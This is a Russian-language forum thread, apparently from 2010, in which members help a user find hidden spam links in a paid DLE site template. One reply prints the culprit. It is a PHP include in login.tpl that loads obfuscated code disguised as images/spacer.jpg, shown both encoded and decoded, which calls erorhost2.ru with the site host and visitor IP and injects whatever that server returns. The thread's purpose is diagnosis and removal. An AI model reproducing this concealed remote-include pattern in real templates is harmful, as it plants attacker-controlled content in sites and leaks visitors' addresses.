Скрытые ссылки в шаблоне ДЛЕ

Discussion in 'Песочница' started by freeman22, 24 Sep 2010.

  1. freeman22

    freeman22 New Member

    Joined:
    23 Sep 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Здравствуйте.
    Установил новый шаблон ДЛЕ. Всё было нормально и вот спустя несколько дней перешёл в кэш (Сохранённую копию) Гугла и там увидел следующие ссылки:

    Самое интересное, что я не вижу подобных ссылок. Смотрел код в разных браузерах, заходил через анонимные прокси - ничего нет!
    Изучал файлы шаблона, вроде все коды в tpl - файлах стандартные для ДЛЕ, смотрел CSS, графические файлы... Не знаю на первый взгляд ничего скрытого в шаблоне нет.
    В общем Гугл видит ссылки, а я нет.
    Если кто знает, посоветуйте пожалуйста, что можно сделать в данной ситуации.
    Шаблон пока поменял на старый.
     
  2. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    367
    Likes Received:
    35
    Reputations:
    1
    Не нашел в выдаче. И не нашел в шабе твоем ничего. :confused:
     
    #2 DCrypt, 24 Sep 2010
    Last edited: 24 Sep 2010
  3. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196

    Интересно, как ты узнал какой сайт его? Их тысячи
    http://siteexplorer.search.yahoo.com/search?p=http://sn27.net/&fr=sfp&bwm=i

    freeman22, для начала заюзай "Антивирус" в админке DLE.
     
  4. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    367
    Likes Received:
    35
    Reputations:
    1
    Мне чел дал шаблон+линк на его сайт. :rolleyes:
     
  5. emillord

    emillord Elder - Старейшина

    Joined:
    20 Jan 2008
    Messages:
    257
    Likes Received:
    444
    Reputations:
    255
    Просмотри .js фаилы. Вполне возможно, что проиклудили его в шаблон, либо изменили существующий.
    с примерно таким содержанием(*.js):
    + может быть криптован\зашифрован
     
    1 person likes this.
  6. freeman22

    freeman22 New Member

    Joined:
    23 Sep 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Вот кэш этого шаблона, посмотрите там где логин есть цифра 1 и перед ней эти ссылки.
    И посмотрите сейчас какой шаблон, там этих ссылок нет!
     
    #6 freeman22, 24 Sep 2010
    Last edited: 24 Oct 2010
  7. freeman22

    freeman22 New Member

    Joined:
    23 Sep 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    Кстати он не бесплатный покупал здесь http://plati.ru/asp/pay.asp?id_d=927804&searchstr=youporn.ru&agent=0

    Если кто сможет разобраться, где зашили эти ссылки буду благодарен.
    Но деле именно в шаблоне!!! Сейчас на сайте стоит другой шаблон и Гугл не показывает никаких ссылок скрытых!
     
    #7 freeman22, 24 Sep 2010
    Last edited: 20 Oct 2010
  8. DCrypt

    DCrypt Banned

    Joined:
    21 Jan 2010
    Messages:
    367
    Likes Received:
    35
    Reputations:
    1
    Странно..я прочесал весь шаблон с начала и до конца. Никаких шифров вроде небыло.
     
  9. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    в login.tpl


    PHP:
     $void = include ($tpl->dir.'/images/spacer.jpg');
    инклюдит файл ./images/spacer.jpg

    там

    PHP:
    <?php 
     $x0f
    ="\146il\x65"$x10="\x66\163\157c\153o\x70e\x6e"$x11="\151\155\160\x6c\x6f\x64e"
     
    $x0b = @$x10("\x65\x72o\x72\x68\157st\062.r\165"80$x0c$x0d6); if(!$x0b){return ''; }else{$x0e = @$x0f("ht\164\x70\072\057\057ero\162\x68\157st2\056\x72\x75\057\151d\x32\x2e\160\x68\x70\077\163\x69\x74e\075$_SERVER[HTTP_HOST]&\151\160\075$_SERVER[REMOTE_ADDR]");return $x11('',$x0e); } ?>

    Декодированный

    PHP:
     $x0b = @fsockopen("erorhost2.ru"80$x0c$x0d6);
     if(!
    $x0b){
     return 
    ''
     }else{
     
    $x0e = @file("http://erorhost2.ru/id2.php?site=$_SERVER[HTTP_HOST]&ip=$_SERVER[REMOTE_ADDR]");
     return 
    implode('',$x0e); 
     }


    http://www.google.ru/search?sourceid=chrome&ie=UTF-8&q=erorhost2
     
    #9 попугай, 24 Sep 2010
    Last edited: 24 Sep 2010
    1 person likes this.
  10. freeman22

    freeman22 New Member

    Joined:
    23 Sep 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    попугай, большое спасибо!
    Убрал в tpl строчку с инклудом и удалил spacer.jpg. Вернул шаблон, надеюсь ссылок этих больше в кэше Гугла не увижу.

    P.S.Вот такую "заразу" можно и за деньги купить. Жалко, что на plati.ru претензии (с целью возврата средств) принимаются только в течении 3 дней с момента покупки товара.

    Рано обрадовался.
    Если просто зайти на сайт, не под админ-аккаунтом, то видна пустая страница, если вернуть $void = include ($tpl->dir.'/images/spacer.jpg'); , но при этом удалить spacer.jpg , то
     
    #10 freeman22, 24 Sep 2010
    Last edited: 20 Oct 2010
  11. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    Ну, естественно, удалить нужно было не одну строчку.

    Вот готовый login.tpl http://pastebin.com/UfHPTxei
     
    1 person likes this.
  12. freeman22

    freeman22 New Member

    Joined:
    23 Sep 2010
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    попугай Теперь работает. Ещё раз спасибо.
     
  13. Внучёк

    Внучёк New Member

    Joined:
    16 Oct 2010
    Messages:
    7
    Likes Received:
    0
    Reputations:
    0
    Платный шаблон еще и ссылками, в обще бес предел, такое еще в бесплатных не встречал, а в общем нужно тщательно проверять все файлы, много всяких уловок придумают, а потом удивляешься по чему взломали и или повесили табличку на сайт.